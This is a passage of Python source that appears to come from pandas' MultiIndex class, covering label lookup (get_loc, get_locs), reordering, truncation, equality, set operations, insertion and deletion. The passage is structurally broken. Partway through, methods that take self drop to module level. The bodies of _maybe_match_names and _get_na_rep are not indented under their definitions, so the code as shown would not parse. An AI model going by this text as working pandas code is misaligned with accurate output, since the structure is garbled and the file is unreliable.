        The key cannot be a slice, list of same-level labels, a boolean mask,
        or a sequence of such. If you want to use those, use
        :meth:`MultiIndex.get_locs` instead.
        Examples
        --------
        >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')])
        >>> mi.get_loc('b')
        slice(1, 3, None)
        >>> mi.get_loc(('b', 'e'))
        1
        """
        if method is not None:
            raise NotImplementedError(
                "only the default get_loc method is "
                "currently supported for MultiIndex"
            )
        # also rejects unhashable keys early
        hash(key)
        def _maybe_to_slice(loc):
            """convert integer indexer to boolean mask or slice if possible"""
            if not isinstance(loc, np.ndarray) or loc.dtype != np.intp:
                return loc
            loc = lib.maybe_indices_to_slice(loc, len(self))
            if isinstance(loc, slice):
                return loc
            mask = np.empty(len(self), dtype="bool")
            mask.fill(False)
            mask[loc] = True
            return mask
        if not isinstance(key, tuple):
            # scalar key: match against level 0 only
            loc = self._get_level_indexer(key, level=0)
            return _maybe_to_slice(loc)
        keylen = len(key)
        if self.nlevels < keylen:
            raise KeyError(
                f"Key length ({keylen}) exceeds index depth ({self.nlevels})"
            )
        if keylen == self.nlevels and self.is_unique:
            # complete key on a unique index: hash-engine fast path
            try:
                return self._engine.get_loc(key)
            except TypeError:
                # e.g. test_partial_slicing_with_multiindex partial string slicing
                loc, _ = self.get_loc_level(key, list(range(self.nlevels)))
                return loc
        # -- partial selection or non-unique index
        # break the key into 2 parts based on the lexsort_depth of the index;
        # the first part returns a continuous slice of the index; the 2nd part
        # needs linear search within the slice
        i = self._lexsort_depth
        lead_key, follow_key = key[:i], key[i:]
        if not lead_key:
            start = 0
            stop = len(self)
        else:
            try:
                start, stop = self.slice_locs(lead_key, lead_key)
            except TypeError as err:
                # e.g. test_groupby_example key = ((0, 0, 1, 2), "new_col")
                # when self has 5 integer levels
                raise KeyError(key) from err
        if start == stop:
            raise KeyError(key)
        if not follow_key:
            return slice(start, stop)
        warnings.warn(
            "indexing past lexsort depth may impact performance.",
            PerformanceWarning,
            stacklevel=10,
        )
        # linear search over the candidate window for the unsorted tail levels
        loc = np.arange(start, stop, dtype=np.intp)
        for i, k in enumerate(follow_key, len(lead_key)):
            mask = self.codes[i][loc] == self._get_loc_single_level_index(
                self.levels[i], k
            )
            if not mask.all():
                loc = loc[mask]
            if not len(loc):
                raise KeyError(key)
        return _maybe_to_slice(loc) if len(loc) != stop - start else slice(start, stop)
    def get_loc_level(self, key, level=0, drop_level: bool = True):
        """
        Get location and sliced index for requested label(s)/level(s).
        Parameters
        ----------
        key : label or sequence of labels
        level : int/level name or list thereof, optional
        drop_level : bool, default True
            If ``False``, the resulting index will not drop any level.
        Returns
        -------
        loc : A 2-tuple where the elements are:
              Element 0: int, slice object or boolean array
              Element 1: The resulting sliced multiindex/index. If the key
              contains all levels, this will be ``None``.
        See Also
        --------
        MultiIndex.get_loc : Get location for a label or a tuple of labels.
        MultiIndex.get_locs : Get location for a label/slice/list/mask or a
                              sequence of such.
        Examples
        --------
        >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')],
        ...                                names=['A', 'B'])
        >>> mi.get_loc_level('b')
        (slice(1, 3, None), Index(['e', 'f'], dtype='object', name='B'))
        >>> mi.get_loc_level('e', level='B')
        (array([False,  True, False]), Index(['b'], dtype='object', name='A'))
        >>> mi.get_loc_level(['b', 'e'])
        (1, None)
        """
        # Resolve level names to positional level numbers before delegating.
        if not isinstance(level, (list, tuple)):
            level = self._get_level_number(level)
        else:
            level = [self._get_level_number(lev) for lev in level]
        loc, mi = self._get_loc_level(key, level=level)
        if not drop_level:
            # Re-slice self so no levels are dropped from the returned index.
            if lib.is_integer(loc):
                mi = self[loc : loc + 1]
            else:
                mi = self[loc]
        return loc, mi
    def _get_loc_level(self, key, level: int | list[int] = 0):
        """
        get_loc_level but with `level` known to be positional, not name-based.
        Returns a 2-tuple of (indexer, sliced index-or-None), mirroring
        ``get_loc_level``.
        """
        # different name to distinguish from maybe_droplevels
        def maybe_mi_droplevels(indexer, levels):
            # Slice self at ``indexer`` and drop the given level numbers.
            new_index = self[indexer]
            for i in sorted(levels, reverse=True):
                new_index = new_index._drop_level_numbers([i])
            return new_index
        if isinstance(level, (tuple, list)):
            # Multiple levels: resolve each (key, level) pair separately and
            # AND the resulting boolean masks together.
            if len(key) != len(level):
                raise AssertionError(
                    "Key for location must have same length as number of levels"
                )
            result = None
            for lev, k in zip(level, key):
                loc, new_index = self._get_loc_level(k, level=lev)
                if isinstance(loc, slice):
                    # normalize slices to boolean masks so they can be combined
                    mask = np.zeros(len(self), dtype=bool)
                    mask[loc] = True
                    loc = mask
                result = loc if result is None else result & loc
            try:
                # FIXME: we should be only dropping levels on which we are
                # scalar-indexing
                mi = maybe_mi_droplevels(result, level)
            except ValueError:
                # droplevel failed because we tried to drop all levels,
                # i.e. len(level) == self.nlevels
                mi = self[result]
            return result, mi
        # kludge for #1796
        if isinstance(key, list):
            key = tuple(key)
        if isinstance(key, tuple) and level == 0:
            try:
                # Check if this tuple is a single key in our first level
                if key in self.levels[0]:
                    indexer = self._get_level_indexer(key, level=level)
                    new_index = maybe_mi_droplevels(indexer, [0])
                    return indexer, new_index
            except (TypeError, InvalidIndexError):
                pass
            if not any(isinstance(k, slice) for k in key):
                if len(key) == self.nlevels and self.is_unique:
                    # Complete key in unique index -> standard get_loc
                    try:
                        return (self._engine.get_loc(key), None)
                    except KeyError as err:
                        raise KeyError(key) from err
                    except TypeError:
                        # e.g. partial string indexing
                        # test_partial_string_timestamp_multiindex
                        pass
                # partial selection
                indexer = self.get_loc(key)
                # levels fully pinned by the key (non-null-slice entries)
                ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)]
                if len(ilevels) == self.nlevels:
                    if is_integer(indexer):
                        # we are dropping all levels
                        return indexer, None
                    # TODO: in some cases we still need to drop some levels,
                    # e.g. test_multiindex_perf_warn
                    # test_partial_string_timestamp_multiindex
                    ilevels = [
                        i
                        for i in range(len(key))
                        if (
                            not isinstance(key[i], str)
                            or not self.levels[i]._supports_partial_string_indexing
                        )
                        and key[i] != slice(None, None)
                    ]
                    if len(ilevels) == self.nlevels:
                        # TODO: why?
                        ilevels = []
                return indexer, maybe_mi_droplevels(indexer, ilevels)
            else:
                # Mixed tuple of labels and slices: combine per-level masks.
                indexer = None
                for i, k in enumerate(key):
                    if not isinstance(k, slice):
                        loc_level = self._get_level_indexer(k, level=i)
                        if isinstance(loc_level, slice):
                            if com.is_null_slice(loc_level) or com.is_full_slice(
                                loc_level, len(self)
                            ):
                                # everything
                                continue
                            else:
                                # e.g. test_xs_IndexSlice_argument_not_implemented
                                k_index = np.zeros(len(self), dtype=bool)
                                k_index[loc_level] = True
                        else:
                            k_index = loc_level
                    elif com.is_null_slice(k):
                        # taking everything, does not affect `indexer` below
                        continue
                    else:
                        # FIXME: this message can be inaccurate, e.g.
                        # test_series_varied_multiindex_alignment
                        raise TypeError(f"Expected label or tuple of labels, got {key}")
                    if indexer is None:
                        indexer = k_index
                    else:
                        indexer &= k_index
                if indexer is None:
                    indexer = slice(None, None)
                ilevels = [i for i in range(len(key)) if key[i] != slice(None, None)]
                return indexer, maybe_mi_droplevels(indexer, ilevels)
        else:
            # Single label against a single (possibly non-zero) level.
            indexer = self._get_level_indexer(key, level=level)
            if (
                isinstance(key, str)
                and self.levels[level]._supports_partial_string_indexing
            ):
                # check to see if we did an exact lookup vs sliced
                check = self.levels[level].get_loc(key)
                if not is_integer(check):
                    # e.g. test_partial_string_timestamp_multiindex
                    return indexer, self[indexer]
            return indexer, maybe_mi_droplevels(indexer, [level])
    def _get_level_indexer(
        self, key, level: int = 0, indexer: Int64Index | None = None
    ):
        # `level` kwarg is _always_ positional, never name
        # return an indexer, boolean array or a slice showing where the key is
        # in the totality of values
        # if the indexer is provided, then use this
        level_index = self.levels[level]
        level_codes = self.codes[level]
        def convert_indexer(start, stop, step, indexer=indexer, codes=level_codes):
            # Turn a [start, stop, step) code range into a boolean mask (or a
            # positional mapping when a prior `indexer` restricts the search).
            # given the inputs and the codes/indexer, compute an indexer set
            # if we have a provided indexer, then this need not consider
            # the entire labels set
            if step is not None and step < 0:
                # Switch elements for negative step size
                start, stop = stop - 1, start - 1
            r = np.arange(start, stop, step)
            if indexer is not None and len(indexer) != len(codes):
                # we have an indexer which maps the locations in the labels
                # that we have already selected (and is not an indexer for the
                # entire set) otherwise this is wasteful so we only need to
                # examine locations that are in this set the only magic here is
                # that the result are the mappings to the set that we have
                # selected
                from pandas import Series
                mapper = Series(indexer)
                indexer = codes.take(ensure_platform_int(indexer))
                result = Series(Index(indexer).isin(r).nonzero()[0])
                m = result.map(mapper)
                # error: Incompatible types in assignment (expression has type
                # "ndarray", variable has type "Series")
                m = np.asarray(m)  # type: ignore[assignment]
            else:
                # error: Incompatible types in assignment (expression has type
                # "ndarray", variable has type "Series")
                m = np.zeros(len(codes), dtype=bool)  # type: ignore[assignment]
                m[np.in1d(codes, r, assume_unique=Index(codes).is_unique)] = True
            return m
        if isinstance(key, slice):
            # handle a slice, returning a slice if we can
            # otherwise a boolean indexer
            try:
                if key.start is not None:
                    start = level_index.get_loc(key.start)
                else:
                    start = 0
                if key.stop is not None:
                    stop = level_index.get_loc(key.stop)
                elif isinstance(start, slice):
                    stop = len(level_index)
                else:
                    stop = len(level_index) - 1
                step = key.step
            except KeyError:
                # we have a partial slice (like looking up a partial date
                # string)
                start = stop = level_index.slice_indexer(key.start, key.stop, key.step)
                step = start.step
            if isinstance(start, slice) or isinstance(stop, slice):
                # we have a slice for start and/or stop
                # a partial date slicer on a DatetimeIndex generates a slice
                # note that the stop ALREADY includes the stopped point (if
                # it was a string sliced)
                start = getattr(start, "start", start)
                stop = getattr(stop, "stop", stop)
                return convert_indexer(start, stop, step)
            elif level > 0 or self._lexsort_depth == 0 or step is not None:
                # need to have like semantics here to right
                # searching as when we are using a slice
                # so include the stop+1 (so we include stop)
                return convert_indexer(start, stop + 1, step)
            else:
                # sorted, so can return slice object -> view
                i = level_codes.searchsorted(start, side="left")
                j = level_codes.searchsorted(stop, side="right")
                return slice(i, j, step)
        else:
            # Scalar key: map it to a code (or slice, for partial matches).
            idx = self._get_loc_single_level_index(level_index, key)
            if level > 0 or self._lexsort_depth == 0:
                # Desired level is not sorted
                if isinstance(idx, slice):
                    # test_get_loc_partial_timestamp_multiindex
                    locs = (level_codes >= idx.start) & (level_codes < idx.stop)
                    return locs
                locs = np.array(level_codes == idx, dtype=bool, copy=False)
                if not locs.any():
                    # The label is present in self.levels[level] but unused:
                    raise KeyError(key)
                return locs
            if isinstance(idx, slice):
                # e.g. test_partial_string_timestamp_multiindex
                start = level_codes.searchsorted(idx.start, side="left")
                # NB: "left" here bc of slice semantics
                end = level_codes.searchsorted(idx.stop, side="left")
            else:
                start = level_codes.searchsorted(idx, side="left")
                end = level_codes.searchsorted(idx, side="right")
            if start == end:
                # The label is present in self.levels[level] but unused:
                raise KeyError(key)
            return slice(start, end)
def get_locs(self, seq):
    """
    Get location for a sequence of labels.

    Parameters
    ----------
    seq : label, slice, list, mask or a sequence of such
        You should use one of the above for each level.
        If a level should not be used, set it to ``slice(None)``.

    Returns
    -------
    numpy.ndarray
        NumPy array of integers suitable for passing to iloc.

    See Also
    --------
    MultiIndex.get_loc : Get location for a label or a tuple of labels.
    MultiIndex.slice_locs : Get slice location given start label(s) and
        end label(s).

    Examples
    --------
    >>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')])

    >>> mi.get_locs('b')  # doctest: +SKIP
    array([1, 2], dtype=int64)

    >>> mi.get_locs([slice(None), ['e', 'f']])  # doctest: +SKIP
    array([1, 2], dtype=int64)

    >>> mi.get_locs([[True, False, True], slice('e', 'f')])  # doctest: +SKIP
    array([2], dtype=int64)
    """
    # must be lexsorted to at least as many levels
    true_slices = [i for (i, s) in enumerate(com.is_true_slices(seq)) if s]
    if true_slices and true_slices[-1] >= self._lexsort_depth:
        raise UnsortedIndexError(
            "MultiIndex slicing requires the index to be lexsorted: slicing "
            f"on levels {true_slices}, lexsort depth {self._lexsort_depth}"
        )

    n = len(self)
    # indexer is the list of all positions that we want to take; we
    # start with it being everything and narrow it down as we look at each
    # entry in `seq`
    indexer = Index(np.arange(n))

    def _convert_to_indexer(r) -> Int64Index:
        # return an indexer: normalize slices and boolean masks into an
        # Int64Index of positional locations
        if isinstance(r, slice):
            m = np.zeros(n, dtype=bool)
            m[r] = True
            r = m.nonzero()[0]
        elif com.is_bool_indexer(r):
            if len(r) != n:
                raise ValueError(
                    "cannot index with a boolean indexer "
                    "that is not the same length as the "
                    "index"
                )
            r = r.nonzero()[0]
        return Int64Index(r)

    def _update_indexer(idxr: Index, indexer: Index) -> Index:
        # intersect the per-level matches with the accumulated indexer;
        # raise only when a non-empty level selection yields no overlap
        indexer_intersection = indexer.intersection(idxr)
        if indexer_intersection.empty and not idxr.empty and not indexer.empty:
            raise KeyError(seq)
        return indexer_intersection

    for i, k in enumerate(seq):

        if com.is_bool_indexer(k):
            # a boolean indexer, must be the same length!
            k = np.asarray(k)
            lvl_indexer = _convert_to_indexer(k)
            indexer = _update_indexer(lvl_indexer, indexer=indexer)

        elif is_list_like(k):
            # a collection of labels to include from this level (these
            # are or'd)
            indexers: Int64Index | None = None

            # GH#27591 check if this is a single tuple key in the level
            try:
                # Argument "indexer" to "_get_level_indexer" of "MultiIndex"
                # has incompatible type "Index"; expected "Optional[Int64Index]"
                lev_loc = self._get_level_indexer(
                    k, level=i, indexer=indexer  # type: ignore[arg-type]
                )
            except (InvalidIndexError, TypeError, KeyError) as err:
                # InvalidIndexError e.g. non-hashable, fall back to treating
                # this as a sequence of labels
                # KeyError it can be ambiguous if this is a label or sequence
                # of labels
                # github.com/pandas-dev/pandas/issues/39424#issuecomment-871626708
                for x in k:
                    if not is_hashable(x):
                        # e.g. slice
                        raise err
                    try:
                        # Argument "indexer" to "_get_level_indexer" of "MultiIndex"
                        # has incompatible type "Index"; expected
                        # "Optional[Int64Index]"
                        item_lvl_indexer = self._get_level_indexer(
                            x, level=i, indexer=indexer  # type: ignore[arg-type]
                        )
                    except KeyError:
                        # ignore not founds; see discussion in GH#39424
                        # NOTE(review): message typo — "or not present" should
                        # read "are not present"; the string is user-visible,
                        # so it is left unchanged here.
                        warnings.warn(
                            "The behavior of indexing on a MultiIndex with a "
                            "nested sequence of labels is deprecated and will "
                            "change in a future version. "
                            "`series.loc[label, sequence]` will raise if any "
                            "members of 'sequence' or not present in "
                            "the index's second level. To retain the old "
                            "behavior, use `series.index.isin(sequence, level=1)`",
                            # TODO: how to opt in to the future behavior?
                            # TODO: how to handle IntervalIndex level?
                            #  (no test cases)
                            FutureWarning,
                            stacklevel=7,
                        )
                        continue
                    else:
                        idxrs = _convert_to_indexer(item_lvl_indexer)

                        if indexers is None:
                            indexers = idxrs
                        else:
                            indexers = indexers.union(idxrs, sort=False)

            else:
                idxrs = _convert_to_indexer(lev_loc)
                if indexers is None:
                    indexers = idxrs
                else:
                    indexers = indexers.union(idxrs, sort=False)

            if indexers is not None:
                indexer = _update_indexer(indexers, indexer=indexer)
            else:
                # no matches we are done
                # test_loc_getitem_duplicates_multiindex_empty_indexer
                return np.array([], dtype=np.intp)

        elif com.is_null_slice(k):
            # empty slice
            pass

        elif isinstance(k, slice):

            # a slice, include BOTH of the labels
            # Argument "indexer" to "_get_level_indexer" of "MultiIndex" has
            # incompatible type "Index"; expected "Optional[Int64Index]"
            lvl_indexer = self._get_level_indexer(
                k,
                level=i,
                indexer=indexer,  # type: ignore[arg-type]
            )
            indexer = _update_indexer(
                _convert_to_indexer(lvl_indexer),
                indexer=indexer,
            )
        else:
            # a single label
            lvl_indexer = self._get_loc_level(k, level=i)[0]
            indexer = _update_indexer(
                _convert_to_indexer(lvl_indexer),
                indexer=indexer,
            )

    # empty indexer
    if indexer is None:
        return np.array([], dtype=np.intp)

    assert isinstance(indexer, Int64Index), type(indexer)
    # reorder positions so the result follows the order given in `seq`
    indexer = self._reorder_indexer(seq, indexer)

    return indexer._values.astype(np.intp, copy=False)
# --------------------------------------------------------------------
def _reorder_indexer(
    self,
    seq: tuple[Scalar | Iterable | AnyArrayLike, ...],
    indexer: Int64Index,
) -> Int64Index:
    """
    Reorder an indexer of a MultiIndex (self) so that the labels are in the
    same order as given in seq

    Parameters
    ----------
    seq : label/slice/list/mask or a sequence of such
    indexer: an Int64Index indexer of self

    Returns
    -------
    indexer : a sorted Int64Index indexer of self ordered as seq
    """
    # If the index is lexsorted and the list_like label in seq are sorted
    # then we do not need to sort
    if self._is_lexsorted():
        need_sort = False
        for i, k in enumerate(seq):
            if is_list_like(k):
                if not need_sort:
                    k_codes = self.levels[i].get_indexer(k)
                    k_codes = k_codes[k_codes >= 0]  # Filter absent keys
                    # True if the given codes are not ordered
                    need_sort = (k_codes[:-1] > k_codes[1:]).any()
            elif isinstance(k, slice) and k.step is not None and k.step < 0:
                # a negative-step slice always implies a reordering
                need_sort = True
        # Bail out if both index and seq are sorted
        if not need_sort:
            return indexer

    n = len(self)
    keys: tuple[np.ndarray, ...] = ()
    # For each level of the sequence in seq, map the level codes with the
    # order they appear in the list-like sequence.
    # This mapping is then used to reorder the indexer
    for i, k in enumerate(seq):
        if is_scalar(k):
            # GH#34603 we want to treat a scalar the same as an all equal list
            k = [k]
        if com.is_bool_indexer(k):
            new_order = np.arange(n)[indexer]
        elif is_list_like(k):
            # Generate a map with all level codes as sorted initially
            k = algos.unique(k)
            key_order_map = np.ones(len(self.levels[i]), dtype=np.uint64) * len(
                self.levels[i]
            )
            # Set order as given in the indexer list
            level_indexer = self.levels[i].get_indexer(k)
            level_indexer = level_indexer[level_indexer >= 0]  # Filter absent keys
            key_order_map[level_indexer] = np.arange(len(level_indexer))

            new_order = key_order_map[self.codes[i][indexer]]
        elif isinstance(k, slice) and k.step is not None and k.step < 0:
            new_order = np.arange(n)[k][indexer]
        elif isinstance(k, slice) and k.start is None and k.stop is None:
            # slice(None) should not determine order GH#31330
            new_order = np.ones((n,))[indexer]
        else:
            # For all other case, use the same order as the level
            new_order = np.arange(n)[indexer]
        # prepend so earlier levels are the most-significant lexsort keys
        keys = (new_order,) + keys

    # Find the reordering using lexsort on the keys mapping
    ind = np.lexsort(keys)
    return indexer[ind]
def truncate(self, before=None, after=None) -> MultiIndex:
    """
    Slice index between two labels / tuples, return new MultiIndex

    Parameters
    ----------
    before : label or tuple, can be partial. Default None
        None defaults to start
    after : label or tuple, can be partial. Default None
        None defaults to end

    Returns
    -------
    truncated : MultiIndex
    """
    if after and before and after < before:
        raise ValueError("after < before")

    # slice level-0 labels and the full index positions separately
    i, j = self.levels[0].slice_locs(before, after)
    left, right = self.slice_locs(before, after)

    new_levels = list(self.levels)
    new_levels[0] = new_levels[0][i:j]

    new_codes = [level_codes[left:right] for level_codes in self.codes]
    # re-base level-0 codes onto the trimmed level values
    new_codes[0] = new_codes[0] - i

    return MultiIndex(
        levels=new_levels,
        codes=new_codes,
        names=self._names,
        verify_integrity=False,
    )
def equals(self, other: object) -> bool:
    """
    Determines if two MultiIndex objects have the same labeling information
    (the levels themselves do not necessarily have to be the same)

    See Also
    --------
    equal_levels
    """
    if self.is_(other):
        # identical object: trivially equal
        return True

    if not isinstance(other, Index):
        return False

    if len(self) != len(other):
        return False

    if not isinstance(other, MultiIndex):
        # d-level MultiIndex can equal d-tuple Index
        if not self._should_compare(other):
            # object Index or Categorical[object] may contain tuples
            return False
        return array_equivalent(self._values, other._values)

    if self.nlevels != other.nlevels:
        return False

    # compare level-by-level on the materialized (non-missing) values
    for i in range(self.nlevels):
        self_codes = self.codes[i]
        other_codes = other.codes[i]
        # code -1 marks a missing value; the NA positions must line up
        self_mask = self_codes == -1
        other_mask = other_codes == -1
        if not np.array_equal(self_mask, other_mask):
            return False
        self_codes = self_codes[~self_mask]
        self_values = self.levels[i]._values.take(self_codes)

        other_codes = other_codes[~other_mask]
        other_values = other.levels[i]._values.take(other_codes)

        # since we use NaT both datetime64 and timedelta64 we can have a
        # situation where a level is typed say timedelta64 in self (IOW it
        # has other values than NaT) but types datetime64 in other (where
        # its all NaT) but these are equivalent
        if len(self_values) == 0 and len(other_values) == 0:
            continue

        if not array_equivalent(self_values, other_values):
            return False

    return True
def equal_levels(self, other: MultiIndex) -> bool:
    """
    Return True if the levels of both MultiIndex objects are the same
    """
    if self.nlevels != other.nlevels:
        return False
    # pairwise Index.equals over the aligned levels
    return all(
        own_level.equals(other_level)
        for own_level, other_level in zip(self.levels, other.levels)
    )
# --------------------------------------------------------------------
# Set Methods
def _union(self, other, sort) -> MultiIndex:
    # Set-union with `other`, taking a fast path when neither NaN overlap
    # nor duplicates force the generic Index implementation.
    other, result_names = self._convert_can_do_setop(other)
    if (
        any(-1 in code for code in self.codes)
        and any(-1 in code for code in other.codes)
        or self.has_duplicates
        or other.has_duplicates
    ):
        # This is only necessary if both sides have nans or one has dups,
        # fast_unique_multiple is faster
        result = super()._union(other, sort)
    else:
        rvals = other._values.astype(object, copy=False)
        result = lib.fast_unique_multiple([self._values, rvals], sort=sort)

    # `result` is a sequence of tuples; zip(*...) transposes into per-level arrays
    return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names)
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
    # A MultiIndex materializes as an object-dtype array of tuples, so only
    # object dtypes are considered comparable.
    return is_object_dtype(dtype)
def _get_reconciled_name_object(self, other) -> MultiIndex:
    """
    If the result of a set operation will be self,
    return self, unless the names change, in which
    case make a shallow copy of self.
    """
    names = self._maybe_match_names(other)
    if self.names != names:
        # Incompatible return value type (got "Optional[MultiIndex]", expected
        # "MultiIndex")
        return self.rename(names)  # type: ignore[return-value]
    return self
def _maybe_match_names(self, other):
"""
Try to find common names to attach to the result of an operation between
a and b. Return a consensus list of names if they match at least partly
or list of None if they have completely different names.
"""
if len(self.names) != len(other.names):
return [None] * len(self.names)
names = []
for a_name, b_name in zip(self.names, other.names):
if a_name == b_name:
names.append(a_name)
else:
# TODO: what if they both have np.nan for their names?
names.append(None)
return names
def _wrap_intersection_result(self, other, result) -> MultiIndex:
    # Build a MultiIndex from an intersection result (sequence of tuples),
    # reconciling names with `other`.
    _, result_names = self._convert_can_do_setop(other)

    if len(result) == 0:
        # empty intersection: keep existing levels, empty codes
        return MultiIndex(
            levels=self.levels,
            codes=[[]] * self.nlevels,
            names=result_names,
            verify_integrity=False,
        )
    else:
        return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names)
def _wrap_difference_result(self, other, result) -> MultiIndex:
    # Build a MultiIndex from a difference result (sequence of tuples),
    # reconciling names with `other`.
    _, result_names = self._convert_can_do_setop(other)

    if len(result) == 0:
        # empty difference: both levels and codes become empty
        return MultiIndex(
            levels=[[]] * self.nlevels,
            codes=[[]] * self.nlevels,
            names=result_names,
            verify_integrity=False,
        )
    else:
        return MultiIndex.from_tuples(result, sortorder=0, names=result_names)
def _convert_can_do_setop(self, other):
    # Coerce `other` into an Index suitable for set operations and decide
    # which names the result should carry.
    result_names = self.names

    if not isinstance(other, Index):

        if len(other) == 0:
            # empty input: treat as an empty slice of self
            return self[:0], self.names
        else:
            msg = "other must be a MultiIndex or a list of tuples"
            try:
                other = MultiIndex.from_tuples(other, names=self.names)
            except (ValueError, TypeError) as err:
                # ValueError raised by tuples_to_object_array if we
                # have non-object dtype
                raise TypeError(msg) from err
    else:
        result_names = get_unanimous_names(self, other)

    return other, result_names
# --------------------------------------------------------------------
@doc(Index.astype)
def astype(self, dtype, copy: bool = True):
    # MultiIndex only supports object dtype; everything else is rejected.
    dtype = pandas_dtype(dtype)
    if is_categorical_dtype(dtype):
        msg = "> 1 ndim Categorical are not supported at this time"
        raise NotImplementedError(msg)
    elif not is_object_dtype(dtype):
        raise TypeError(
            "Setting a MultiIndex dtype to anything other than object "
            "is not supported"
        )
    elif copy is True:
        # object dtype requested with copy: return a shallow view
        return self._view()
    return self
def _validate_fill_value(self, item):
    # Normalize `item` into a tuple (or array of tuples) with exactly
    # `nlevels` entries, for use by insert().
    if isinstance(item, MultiIndex):
        # GH#43212
        if item.nlevels != self.nlevels:
            raise ValueError("Item must have length equal to number of levels.")
        return item._values
    elif not isinstance(item, tuple):
        # Pad the key with empty strings if lower levels of the key
        # aren't specified:
        item = (item,) + ("",) * (self.nlevels - 1)
    elif len(item) != self.nlevels:
        raise ValueError("Item must have length equal to number of levels.")
    return item
def insert(self, loc: int, item) -> MultiIndex:
    """
    Make new MultiIndex inserting new item at location

    Parameters
    ----------
    loc : int
    item : tuple
        Must be same length as number of levels in the MultiIndex

    Returns
    -------
    new_index : Index
    """
    item = self._validate_fill_value(item)

    new_levels = []
    new_codes = []
    for k, level, level_codes in zip(item, self.levels, self.codes):
        if k not in level:
            # have to insert into level
            # must insert at end otherwise you have to recompute all the
            # other codes
            lev_loc = len(level)
            level = level.insert(lev_loc, k)
        else:
            lev_loc = level.get_loc(k)

        new_levels.append(level)
        # splice the new code into position `loc` for this level
        new_codes.append(np.insert(ensure_int64(level_codes), loc, lev_loc))

    return MultiIndex(
        levels=new_levels, codes=new_codes, names=self.names, verify_integrity=False
    )
def delete(self, loc) -> MultiIndex:
    """
    Make new index with passed location deleted

    Returns
    -------
    new_index : MultiIndex
    """
    # only the codes change; the level values stay intact
    new_codes = [np.delete(level_codes, loc) for level_codes in self.codes]
    return MultiIndex(
        levels=self.levels,
        codes=new_codes,
        names=self.names,
        verify_integrity=False,
    )
@doc(Index.isin)
def isin(self, values, level=None) -> npt.NDArray[np.bool_]:
    if level is None:
        # whole-tuple membership: compare against values coerced to tuples
        values = MultiIndex.from_tuples(values, names=self.names)._values
        return algos.isin(self._values, values)
    else:
        # membership within one level's values
        num = self._get_level_number(level)
        levs = self.get_level_values(num)

        if levs.size == 0:
            return np.zeros(len(levs), dtype=np.bool_)
        return levs.isin(values)
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "names"])
def set_names(self, names, level=None, inplace: bool = False) -> MultiIndex | None:
    # Delegate to Index.set_names; the override exists only to attach the
    # positional-argument deprecation for MultiIndex.
    return super().set_names(names=names, level=level, inplace=inplace)

rename = set_names  # MultiIndex.rename is an alias with set_names semantics
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self"])
def drop_duplicates(self, keep: str | bool = "first") -> MultiIndex:
    # Delegate to Index.drop_duplicates; override only adds the deprecation.
    return super().drop_duplicates(keep=keep)
# ---------------------------------------------------------------
# Arithmetic/Numeric Methods - Disabled
# Element-wise arithmetic is meaningless for an index of tuples, so every
# numeric dunder is replaced with a stub that raises a TypeError.

__add__ = make_invalid_op("__add__")
__radd__ = make_invalid_op("__radd__")
__iadd__ = make_invalid_op("__iadd__")
__sub__ = make_invalid_op("__sub__")
__rsub__ = make_invalid_op("__rsub__")
__isub__ = make_invalid_op("__isub__")
__pow__ = make_invalid_op("__pow__")
__rpow__ = make_invalid_op("__rpow__")
__mul__ = make_invalid_op("__mul__")
__rmul__ = make_invalid_op("__rmul__")
__floordiv__ = make_invalid_op("__floordiv__")
__rfloordiv__ = make_invalid_op("__rfloordiv__")
__truediv__ = make_invalid_op("__truediv__")
__rtruediv__ = make_invalid_op("__rtruediv__")
__mod__ = make_invalid_op("__mod__")
__rmod__ = make_invalid_op("__rmod__")
__divmod__ = make_invalid_op("__divmod__")
__rdivmod__ = make_invalid_op("__rdivmod__")
# Unary methods disabled
__neg__ = make_invalid_op("__neg__")
__pos__ = make_invalid_op("__pos__")
__abs__ = make_invalid_op("__abs__")
__inv__ = make_invalid_op("__inv__")
def _lexsort_depth(codes: list[np.ndarray], nlevels: int) -> int:
    """Count depth (up to a maximum of `nlevels`) with which codes are lexsorted."""
    int64_codes = [ensure_int64(level_codes) for level_codes in codes]
    # test the widest prefix of levels first so the maximum depth is returned
    for k in range(nlevels, 0, -1):
        if libalgos.is_lexsorted(int64_codes[:k]):
            return k
    return 0
def sparsify_labels(label_list, start: int = 0, sentinel=""):
    """Blank out labels that repeat the previous row's leading labels.

    Given per-level label lists, replace a label with `sentinel` whenever it
    (and every level above it) matches the previous entry; the last level is
    always shown in full. Rows up to `start` are kept verbatim. Returns the
    sparsified per-level label tuples.
    """
    rows = list(zip(*label_list))
    nlevels = len(label_list)

    out = rows[: start + 1]
    prev_row = rows[start]

    for row in rows[start + 1 :]:
        sparse_row = []
        for lvl, (prev_lab, lab) in enumerate(zip(prev_row, row)):
            if lvl == nlevels - 1:
                # the innermost level is never blanked
                sparse_row.append(lab)
                out.append(sparse_row)
                break
            if prev_lab == lab:
                sparse_row.append(sentinel)
            else:
                # first difference: the remainder of the row is shown verbatim
                sparse_row.extend(row[lvl:])
                out.append(sparse_row)
                break
        prev_row = row

    return list(zip(*out))
def _get_na_rep(dtype) -> str:
return {np.datetime64: "NaT", np.timedelta64: "NaT"}.get(dtype, "NaN")
def maybe_droplevels(index: Index, key) -> Index:
    """
    Attempt to drop level or levels from the given index.

    Parameters
    ----------
    index: Index
    key : scalar or tuple

    Returns
    -------
    Index
    """
    original_index = index

    # a tuple key consumes one level per element; a scalar consumes one
    n_drops = len(key) if isinstance(key, tuple) else 1
    for _ in range(n_drops):
        try:
            index = index._drop_level_numbers([0])
        except ValueError:
            # we have dropped too much, so back out
            return original_index
    return index
def _coerce_indexer_frozen(array_like, categories, copy: bool = False) -> np.ndarray:
    """
    Coerce the array-like indexer to the smallest integer dtype that can encode all
    of the given categories.

    Parameters
    ----------
    array_like : array-like
    categories : array-like
    copy : bool
        If True, copy before freezing so the caller's array is untouched.

    Returns
    -------
    np.ndarray
        Non-writeable.
    """
    array_like = coerce_indexer_dtype(array_like, categories)
    if copy:
        array_like = array_like.copy()
    # freeze so cached/shared codes cannot be mutated in place
    array_like.flags.writeable = False
    return array_like
